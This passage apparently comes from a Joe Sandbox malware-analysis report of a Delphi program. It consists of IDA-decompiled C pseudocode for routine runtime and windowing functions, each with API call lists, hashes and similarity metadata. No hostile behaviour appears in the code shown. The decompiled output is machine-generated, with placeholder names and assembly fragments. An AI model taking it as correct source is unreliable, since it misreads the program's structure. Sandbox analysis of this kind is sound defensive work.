      					E00445AE8(_t111, E00425B40( *((intOrPtr*)(_t111 + 0x68)), _t94, _t96), 0x30, 1);
      					_t130 =  *((char*)(_t111 + 0x5c));
      					if( *((char*)(_t111 + 0x5c)) != 0) {
      						E00403DF8(_t111, _t130);
      					}
      					_pop(_t104);
      					 *[fs:eax] = _t104;
      					_push(0x4482b0);
      					return E00404A40( &_v196);
      				} else {
      					_t94 =  *((intOrPtr*)(__eax + 4));
      					if(_t94 == 0 || ( *(_t94 + 0x1c) & 0x00000002) == 0) {
      						L6:
      						_v192 =  *((intOrPtr*)(_t111 + 8));
      						_v188 = 0xb;
      						_t86 =  *0x48f890; // 0x423af8
      						E00406A3C(_t86, _t95,  &_v196);
      						_t95 = _v196;
      						E0040CC28(_t94, _v196, 1, _t109, _t111, 0,  &_v192);
      						E004043D0();
      					} else {
      						_t108 =  *0x4406ec; // 0x440738
      						if(E00403D88(_t94, _t108) == 0) {
      							goto L6;
      						}
      						_v116 = E0044B158(_t94);
      					}
      					goto L7;
      				}
      			}


      APIs
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: ClassLongWindow$InfoRegisterUnregister
      • String ID: @
      • API String ID: 717780171-2766056989
      • Opcode ID: fc52af3242f8fe44ece93e04f8093c28dd293eaf74805cf60824bf27036c892d
      • Instruction ID: 4e1d3de6b91343a7247f532c712740ead0f23468df892c52b6e02ea6696341c7
      • Opcode Fuzzy Hash: fc52af3242f8fe44ece93e04f8093c28dd293eaf74805cf60824bf27036c892d
      • Instruction Fuzzy Hash: DC51B270A007149BEB21EBA9CC81B9E77E8AF45308F1049BFE505E7391DB78AD45CB58
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetActiveWindow.USER32 ref: 004647D7
      • GetWindowRect.USER32 ref: 00464831
      • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 00464869
      • MessageBoxA.USER32 ref: 004648AA
      • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,00464920,?,00000000,00464919), ref: 004648FA
      • SetActiveWindow.USER32(?,00464920,?,00000000,00464919), ref: 0046490B
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Window$Active$MessageRect
      • String ID: (
      • API String ID: 3147912190-3887548279
      • Opcode ID: b89756c5eee4fc665e40774029766d14bf2f5a081941e707a762cffb37895fdb
      • Instruction ID: e0e9d1010596eee813b013ea9cb6c66ebde7bd2f6c4cfe85e7d936f5e3224c64
      • Opcode Fuzzy Hash: b89756c5eee4fc665e40774029766d14bf2f5a081941e707a762cffb37895fdb
      • Instruction Fuzzy Hash: 70411C75E00108AFDB44EBA9CD95FAEB7F9EB88304F14446AF900E7392D678AD048B55
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 94%
      			E00429304(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
      				intOrPtr* _v8;
      				int _v12;
      				BYTE* _v16;
      				intOrPtr _v18;
      				signed int _v24;
      				short _v26;
      				short _v28;
      				short _v30;
      				short _v32;
      				char _v38;
      				struct tagMETAFILEPICT _v54;
      				intOrPtr _v118;
      				intOrPtr _v122;
      				struct tagENHMETAHEADER _v154;
      				intOrPtr _t103;
      				char* _t110;
      				intOrPtr _t115;
      				struct HENHMETAFILE__* _t119;
      				struct HENHMETAFILE__* _t120;
      				void* _t122;
      				void* _t123;
      				void* _t124;
      				void* _t125;
      				intOrPtr _t126;
      
      				_t124 = _t125;
      				_t126 = _t125 + 0xffffff68;
      				_v12 = __ecx;
      				_v8 = __edx;
      				_t122 = __eax;
      				E004291A0(__eax);
      				_t110 =  &_v38;
      				 *((intOrPtr*)( *_v8 + 0xc))(__edi, __esi, __ebx, _t123);
      				if(_v38 != 0x9ac6cdd7 || E00427C60( &_v38) != _v18) {
      					E00426DF0();
      				}
      				_v12 = _v12 - 0x16;
      				_v16 = E00402ACC(_v12, 0x16, _t110);
      				_t103 =  *((intOrPtr*)(_t122 + 0x28));
      				 *[fs:eax] = _t126;
      				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:eax], 0x429473, _t124);
      				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
      				if(_v24 == 0) {
      					_v24 = 0x60;
      				}
      				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
      				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
      				_v54.mm = 8;
      				_v54.xExt = 0;
      				_v54.yExt = 0;
      				_v54.hMF = 0;
      				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
      				 *(_t103 + 8) = _t119;
      				if(_t119 == 0) {
      					E00426DF0();
      				}
      				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
      				_v54.mm = 8;
      				_v54.xExt = _v122;
      				_v54.yExt = _v118;
      				_v54.hMF = 0;
      				DeleteEnhMetaFile( *(_t103 + 8));
      				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
      				 *(_t103 + 8) = _t120;
      				if(_t120 == 0) {
      					E00426DF0();
      				}
      				 *((char*)(_t122 + 0x2c)) = 0;
      				_pop(_t115);
      				 *[fs:eax] = _t115;
      				_push(0x42947a);
      				return E00402AFC(_v16);
      			}

      APIs
      • MulDiv.KERNEL32(?,000009EC,00000000), ref: 004293A6
      • MulDiv.KERNEL32(?,000009EC,00000000), ref: 004293C3
      • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 004293EF
      • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0042940F
      • DeleteEnhMetaFile.GDI32(00000016), ref: 00429430
      • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 00429443
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: FileMeta$Bits$DeleteHeader
      • String ID: `
      • API String ID: 1990453761-2679148245
      • Opcode ID: c70c0cbaaa0cf432047515090c5fbfeef7bbd5a3c38b86fe825dfe7e07abbbc4
      • Instruction ID: eb1afa40dfcb3bfe3e874fe61b1bf41d7d0a77a2e976b9a762e975979b7a9039
      • Opcode Fuzzy Hash: c70c0cbaaa0cf432047515090c5fbfeef7bbd5a3c38b86fe825dfe7e07abbbc4
      • Instruction Fuzzy Hash: 99412D75E04218AFDB00DFA9D885AAEB7F9EF48710F50806AF804F7281D7789D41CB69
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 69%
      			E0042202C(void* __eax, void* __ebx, void* __edi, void* __esi) {
      				char _v5;
      				intOrPtr* _v12;
      				long _v16;
      				char _v20;
      				char _v24;
      				long _t22;
      				char _t29;
      				void* _t53;
      				intOrPtr _t55;
      				intOrPtr* _t62;
      				intOrPtr _t63;
      				void* _t72;
      				void* _t73;
      				intOrPtr _t74;
      
      				_t72 = _t73;
      				_t74 = _t73 + 0xffffffec;
      				_push(__esi);
      				_push(__edi);
      				_t53 = __eax;
      				_t22 = GetCurrentThreadId();
      				_t62 =  *0x48f9dc; // 0x490030
      				if(_t22 !=  *_t62) {
      					_v24 = GetCurrentThreadId();
      					_v20 = 0;
      					_t3 =  &_v24; // 0x464f40
      					_t55 =  *0x48f83c; // 0x415d00
      					E0040CCE4(_t53, _t55, 1, __edi, __esi, 0, _t3);
      					E004043D0();
      				}
      				if(_t53 <= 0) {
      					E00421FE0();
      				} else {
      					E00421FEC(_t53);
      				}
      				_v16 = 0;
      				_push(0x490868);
      				L00406FE8();
      				_push(_t72);
      				_push(0x4221ba);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t74;
      				_v16 = InterlockedExchange( &E0048E494, _v16);
      				_push(_t72);
      				_push(0x42219b);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t74;
      				if(_v16 == 0 ||  *((intOrPtr*)(_v16 + 8)) <= 0) {
      					_t29 = 0;
      				} else {
      					_t29 = 1;
      				}
      				_v5 = _t29;
      				if(_v5 == 0) {
      					L14:
      					_pop(_t63);
      					 *[fs:eax] = _t63;
      					_push(E004221A2);
      					return E00403BF0(_v16);
      				} else {
      					if( *((intOrPtr*)(_v16 + 8)) > 0) {
      						_v12 = E00419C84(_v16, _t55, 0);
      						E00419B60(_v16, _t55, 0);
      						L00407188();
      						 *[fs:eax] = _t74;
      						 *[fs:eax] = _t74;
      						 *((intOrPtr*)( *_v12 + 8))( *[fs:eax], 0x422136, _t72,  *[fs:eax], 0x422165, _t72, 0x490868);
      						 *[fs:eax] = 0;
      						 *[fs:eax] = 0;
      						_push(E0042216C);
      						_push(0x490868);
      						L00406FE8();
      						return 0;
      					} else {
      						goto L14;
      					}
      				}
      			}

      APIs
      • GetCurrentThreadId.KERNEL32 ref: 00422037
      • GetCurrentThreadId.KERNEL32 ref: 00422046
        • Part of subcall function 00421FE0: ResetEvent.KERNEL32(00000254,00422081,?,?,00000000), ref: 00421FE6
      • RtlEnterCriticalSection.KERNEL32(00490868,?,?,00000000), ref: 0042208B
      • InterlockedExchange.KERNEL32(0048E494,?), ref: 004220A7
      • RtlLeaveCriticalSection.KERNEL32(00490868,00000000,0042219B,?,00000000,004221BA,?,00490868,?,?,00000000), ref: 00422100
      • RtlEnterCriticalSection.KERNEL32(00490868,0042216C,0042219B,?,00000000,004221BA,?,00490868,?,?,00000000), ref: 0042215F
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
      • String ID: @OF
      • API String ID: 2189153385-1736827837
      • Opcode ID: 149f8e27e13d624c581fed08b48e38f9c382e053cd755e0e7d752abf1c3a380d
      • Instruction ID: cd502d4b382624c6988545c56fafd93e8fca2965e23c47e5a9cd19c41e20e1d4
      • Opcode Fuzzy Hash: 149f8e27e13d624c581fed08b48e38f9c382e053cd755e0e7d752abf1c3a380d
      • Instruction Fuzzy Hash: 8431A530B04244BFD701EF65E952E6EB7B4EB49704FA1847BF900D26A1D7BC5D10CA29
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 44%
      			E00422474(char __edx) {
      				char _v8;
      				void* _v12;
      				char _v16;
      				void* __ebp;
      				long _t11;
      				long _t16;
      				void* _t29;
      				intOrPtr* _t36;
      				intOrPtr _t38;
      				void* _t42;
      				void* _t44;
      				intOrPtr _t45;
      
      				_t42 = _t44;
      				_t45 = _t44 + 0xfffffff4;
      				_v8 = __edx;
      				_t11 = GetCurrentThreadId();
      				_t36 =  *0x48f9dc; // 0x490030
      				if(_t11 !=  *_t36) {
      					_v12 = CreateEventA(0, 0xffffffff, 0, 0);
      					_push(_t42);
      					_push(0x422596);
      					_push( *[fs:eax]);
      					 *[fs:eax] = _t45;
      					_push(0x490868);
      					L00406FE8();
      					_push(_t42);
      					_push(0x422578);
      					_push( *[fs:eax]);
      					 *[fs:eax] = _t45;
      					if(E0048E494 == 0) {
      						E0048E494 = E00403BC0(1);
      					}
      					_v16 = _v8;
      					_t16 = E0048E494; // 0x0
      					E00419B14(_t16,  &_v16);
      					E00422008();
      					if( *0x48e482 != 0) {
      						 *0x48e480();
      					}
      					_push(0x490868);
      					L00407188();
      					_push(_t42);
      					_push(0x422559);
      					_push( *[fs:eax]);
      					 *[fs:eax] = _t45;
      					WaitForSingleObject(_v12, 0xffffffff);
      					_pop(_t38);
      					 *[fs:eax] = _t38;
      					_push(0x422560);
      					_push(0x490868);
      					L00406FE8();
      					return 0;
      				} else {
      					_t29 =  *((intOrPtr*)(_v8 + 8))();
      					return _t29;
      				}
      			}

      APIs
      • GetCurrentThreadId.KERNEL32 ref: 0042247E
      • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000), ref: 004224A3
      • RtlEnterCriticalSection.KERNEL32(00490868,00000000,00422596,?,00000000,000000FF,00000000,00000000), ref: 004224BE
      • RtlLeaveCriticalSection.KERNEL32(00490868,00000000,00422578,?,00490868,00000000,00422596,?,00000000,000000FF,00000000,00000000), ref: 00422523
      • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00422559,?,00490868,00000000,00422578,?,00490868,00000000,00422596,?,00000000,000000FF,00000000), ref: 0042253C
      • RtlEnterCriticalSection.KERNEL32(00490868,00422560,00422559,?,00490868,00000000,00422578,?,00490868,00000000,00422596,?,00000000,000000FF,00000000,00000000), ref: 00422553
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CriticalSection$Enter$CreateCurrentEventLeaveObjectSingleThreadWait
      • String ID: @[F
      • API String ID: 1504017990-1227568360
      • Opcode ID: 51a803340c9a434a2d0f293eb959d3d7dc066b3503f076a8bf74edb9b7588612
      • Instruction ID: 12241e6b59ce215c5536ab36e4f3ddb836dcc0c393d45776743e860750913383
      • Opcode Fuzzy Hash: 51a803340c9a434a2d0f293eb959d3d7dc066b3503f076a8bf74edb9b7588612
      • Instruction Fuzzy Hash: 04210630B00204BFC711EF56ED92A197BB4E709714FA14ABAF818A76E1C678A910DB5D
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 67%
      			E0042D868(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
      				void _v20;
      				void* __ebx;
      				void* __esi;
      				void* __ebp;
      				void* _t23;
      				int _t24;
      				struct HMONITOR__* _t27;
      				struct tagMONITORINFO* _t29;
      				intOrPtr* _t31;
      
      				_t29 = _a8;
      				_t27 = _a4;
      				if( *0x490930 != 0) {
      					_t24 = 0;
      					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
      						_t29->rcMonitor.left = 0;
      						_t29->rcMonitor.top = 0;
      						_t29->rcMonitor.right = GetSystemMetrics(0);
      						_t29->rcMonitor.bottom = GetSystemMetrics(1);
      						asm("movsd");
      						asm("movsd");
      						asm("movsd");
      						asm("movsd");
      						_t31 = _t29;
      						 *(_t31 + 0x24) = 1;
      						if( *_t31 >= 0x4c) {
      							_push("DISPLAY");
      							_push(_t31 + 0x28);
      							L00407238();
      						}
      						_t24 = 1;
      					}
      				} else {
      					 *0x490914 = E0042D52C(4, _t23, "GetMonitorInfo",  *0x490914, _t29);
      					_t24 = GetMonitorInfoA(_t27, _t29);
      				}
      				return _t24;
      			}

      APIs
      • GetMonitorInfoA.USER32(?,?), ref: 0042D899
      • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042D8C0
      • GetSystemMetrics.USER32 ref: 0042D8D5
      • GetSystemMetrics.USER32 ref: 0042D8E0
      • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042D90A
        • Part of subcall function 0042D52C: GetProcAddress.KERNEL32(75BA0000,00000000), ref: 0042D5B0
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
      • String ID: DISPLAY$GetMonitorInfo
      • API String ID: 1539801207-1633989206
      • Opcode ID: 6f5a8ceb695d748fedf5634cb3c749f35a4bdc65b2e4f3c355e56c03c40c738a
      • Instruction ID: 0fb2df7bddb07980b2394ff693f064d5f870649fe5961cb5cfd9019e3fba580e
      • Opcode Fuzzy Hash: 6f5a8ceb695d748fedf5634cb3c749f35a4bdc65b2e4f3c355e56c03c40c738a
      • Instruction Fuzzy Hash: 5C11A2B1B053146EE7209F61AC44BB7B7E8EF5A310F40053BF84597251D774A9448BA9
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E00406B5D(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
      				long _t11;
      				void* _t16;
      
      				_t16 = __ebx;
      				 *__edi =  *__edi + __ecx;
      				 *((intOrPtr*)(__eax - 0x4905b8)) =  *((intOrPtr*)(__eax - 0x4905b8)) + __eax - 0x4905b8;
      				 *0x48e008 = 2;
      				 *0x490014 = 0x401270;
      				 *0x490018 = 0x401280;
      				 *0x49004a = 2;
      				 *0x490000 = E00405930;
      				if(E00403A2C() != 0) {
      					_t3 = E00403A5C();
      				}
      				E00403B20(_t3);
      				 *0x490050 = 0xd7b0;
      				 *0x49021c = 0xd7b0;
      				 *0x4903e8 = 0xd7b0;
      				 *0x49003c = GetCommandLineA();
      				 *0x490038 = E004013B0();
      				if((GetVersion() & 0x80000000) == 0x80000000) {
      					 *0x4905bc = E00406A94(GetThreadLocale(), _t16, __eflags);
      				} else {
      					if((GetVersion() & 0x000000ff) <= 4) {
      						 *0x4905bc = E00406A94(GetThreadLocale(), _t16, __eflags);
      					} else {
      						 *0x4905bc = 3;
      					}
      				}
      				_t11 = GetCurrentThreadId();
      				 *0x490030 = _t11;
      				return _t11;
      			}

      APIs
        • Part of subcall function 00403A2C: GetKeyboardType.USER32(00000000), ref: 00403A31
        • Part of subcall function 00403A2C: GetKeyboardType.USER32(00000001), ref: 00403A3D
      • GetCommandLineA.KERNEL32 ref: 00406BC3
      • GetVersion.KERNEL32 ref: 00406BD7
      • GetVersion.KERNEL32 ref: 00406BE8
      • GetCurrentThreadId.KERNEL32 ref: 00406C24
        • Part of subcall function 00403A5C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403A7E
        • Part of subcall function 00403A5C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AB1
        • Part of subcall function 00403A5C: RegCloseKey.ADVAPI32(?,00403AD4,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AC7
      • GetThreadLocale.KERNEL32 ref: 00406C04
        • Part of subcall function 00406A94: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00406AFA), ref: 00406ABA
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
      • String ID: 4~
      • API String ID: 3734044017-3415945278
      • Opcode ID: 03cbf8656f119b610492588a7c22d81d97224ce5a7e3da469f2081b86af96ee9
      • Instruction ID: 00066901b956dc59c34075870135ec19dc8c66e0ac87c54c66954487910e7bfb
      • Opcode Fuzzy Hash: 03cbf8656f119b610492588a7c22d81d97224ce5a7e3da469f2081b86af96ee9
      • Instruction Fuzzy Hash: 85011EB1814341DEF750FFA2A8463093EA0AB22358F51847FE441662F2EB7C5155CF6E
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 79%
      			E00404838(void* __ecx) {
      				long _v4;
      				int _t3;
      
      				if( *0x490048 == 0) {
      					if( *0x48e030 == 0) {
      						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
      					}
      					return _t3;
      				} else {
      					if( *0x49021c == 0xd7b2 &&  *0x490224 > 0) {
      						 *0x490234();
      					}
      					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
      					return WriteFile(GetStdHandle(0xfffffff5), E004048C0, 2,  &_v4, 0);
      				}
      			}

      APIs
      • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00404902,?,?,?,?,00000002,004049AE,00402BFF,00402C47,Audio CD Grabber), ref: 00404871
      • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00404902,?,?,?,?,00000002,004049AE,00402BFF,00402C47), ref: 00404877
      • GetStdHandle.KERNEL32(000000F5,004048C0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00404902), ref: 0040488C
      • WriteFile.KERNEL32(00000000,000000F5,004048C0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00404902), ref: 00404892
      • MessageBoxA.USER32 ref: 004048B0
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: FileHandleWrite$Message
      • String ID: Error$Runtime error at 00000000
      • API String ID: 1570097196-2970929446
      • Opcode ID: 23fc649ffee0dcfef728a3e757cbe38c60e0bc56f9c90a4c00a8b79567053278
      • Instruction ID: 5886380a2466568d730d40b072b26329d42cdc3fae813bc8d9266abe6ff83f02
      • Opcode Fuzzy Hash: 23fc649ffee0dcfef728a3e757cbe38c60e0bc56f9c90a4c00a8b79567053278
      • Instruction Fuzzy Hash: 4FF090A6A843847DEA6073B69C0BF5D22485792F15F608FBFB210B40E297FC58C4832D
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 39%
      			E00451E94(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				char _v28;
      				char _v44;
      				void* __edi;
      				void* __ebp;
      				void* _t46;
      				void* _t57;
      				intOrPtr _t85;
      				intOrPtr _t96;
      				void* _t117;
      				void* _t118;
      				void* _t127;
      				struct HDC__* _t136;
      				struct HDC__* _t137;
      				intOrPtr* _t138;
      				void* _t139;
      
      				_t119 = __ecx;
      				_t135 = __ecx;
      				_v8 = __edx;
      				_t118 = __eax;
      				_t46 = E004519AC(__eax);
      				if(_t46 != 0) {
      					_t142 = _a4;
      					if(_a4 == 0) {
      						__eflags =  *((intOrPtr*)(_t118 + 0x54));
      						if( *((intOrPtr*)(_t118 + 0x54)) == 0) {
      							_t138 = E0042A918(1);
      							 *((intOrPtr*)(_t118 + 0x54)) = _t138;
      							E0042BC58(_t138, 1);
      							 *((intOrPtr*)( *_t138 + 0x40))();
      							_t119 =  *_t138;
      							 *((intOrPtr*)( *_t138 + 0x34))();
      						}
      						E004262F8( *((intOrPtr*)(E0042AEE8( *((intOrPtr*)(_t118 + 0x54))) + 0x14)), _t119, 0xffffff, _t135, _t139, __eflags);
      						E00418618(0,  *((intOrPtr*)(_t118 + 0x34)), 0,  &_v44,  *((intOrPtr*)(_t118 + 0x30)));
      						_push( &_v44);
      						_t57 = E0042AEE8( *((intOrPtr*)(_t118 + 0x54)));
      						_pop(_t127);
      						E0042669C(_t57, _t127);
      						_push(0);
      						_push(0);
      						_push(0xffffffff);
      						_push(0);
      						_push(0);
      						_push(0);
      						_push(0);
      						_push(E00426B00(E0042AEE8( *((intOrPtr*)(_t118 + 0x54)))));
      						_push(_v8);
      						_push(E00451B70(_t118));
      						L0042D02C();
      						E00418618(_a16, _a16 +  *((intOrPtr*)(_t118 + 0x34)), _a12,  &_v28, _a12 +  *((intOrPtr*)(_t118 + 0x30)));
      						_v12 = E00426B00(E0042AEE8( *((intOrPtr*)(_t118 + 0x54))));
      						E004262F8( *((intOrPtr*)(_t135 + 0x14)), _a16 +  *((intOrPtr*)(_t118 + 0x34)), 0xff000014, _t135, _t139, __eflags);
      						_t136 = E00426B00(_t135);
      						SetTextColor(_t136, 0xffffff);
      						SetBkColor(_t136, 0);
      						_push(0xe20746);
      						_push(0);
      						_push(0);
      						_push(_v12);
      						_push( *((intOrPtr*)(_t118 + 0x30)));
      						_push( *((intOrPtr*)(_t118 + 0x34)));
      						_push(_a12 + 1);
      						_t85 = _a16 + 1;
      						__eflags = _t85;
      						_push(_t85);
      						_push(_t136);
      						L00407258();
